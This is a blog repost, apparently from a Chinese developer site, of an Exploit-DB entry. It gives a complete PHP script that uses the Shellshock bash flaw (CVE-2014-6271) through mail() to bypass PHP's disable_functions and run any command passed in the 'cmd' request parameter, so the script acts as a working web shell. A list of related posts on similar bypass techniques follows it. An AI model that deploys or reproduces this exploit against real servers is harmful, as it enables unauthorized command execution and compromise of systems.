PHP 5.x Shellshock Exploit (bypass disable_functions)
2015-02-07 22:46
477 查看
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror # Version: 5.* (tested on 5.6.2) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 <pre> <?php echo "Disabled functions: ".ini_get('disable_functions')."\n"; ?> <?php function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283 if(strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(".","data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); // In Safe Mode, the user may only alter environment variables whose names // begin with the prefixes supplied by this directive. // By default, users will only be able to set environment variables that // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty, // PHP will let the user modify ANY environment variable! mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail } else return "Not vuln (not bash)"; $output = @file_get_contents($tmp); @unlink($tmp); if($output != "") return $output; else return "No output, or not vuln."; } echo shellshock($_REQUEST["cmd"]); ?>
转载自:http://www.exploit-db.com/exploits/35146/
相关文章推荐
- PHP通过bypass disable functions执行系统命令的方法汇总
- PHP Execute Command Bypass Disable_functions
- PHP Execute Command Bypass Disable_functions
- Linux 下用exim4 bypass php disable_functions
- PHP Execute Command Bypass Disable_functions
- 一些需要禁用的PHP危险函数(disable_functions)
- 利用 PHP 扩展模块突破 Disable_functions 执行命令
- PHP <= 5.2.9 Local Safemod Bypass Exploit (win32)
- php危险的函数和类 disable_functions/class
- 有些需要禁用的PHP危险函数(disable_functions)
- PHP推荐禁用函数disable_functions PHP安全配置
- 关于 PHP 开放 enable_dl 函数利用 图片Disable_functions
- 一些需要禁用的PHP危险函数(disable_functions)
- 一些需要禁用的PHP危险函数(disable_functions)
- dedecms v5.5 final getwebshell exploit(datalistcp.class.php)
- 一些需要禁用的PHP危险函数(disable_functions)
- Apache / PHP 5.x Remote Code Execution Exploit
- 一些需要禁用的PHP危险函数(disable_functions)
- php.ini 启用disable_functions提高安全
- PHP利用pcntl_exec突破disable_functions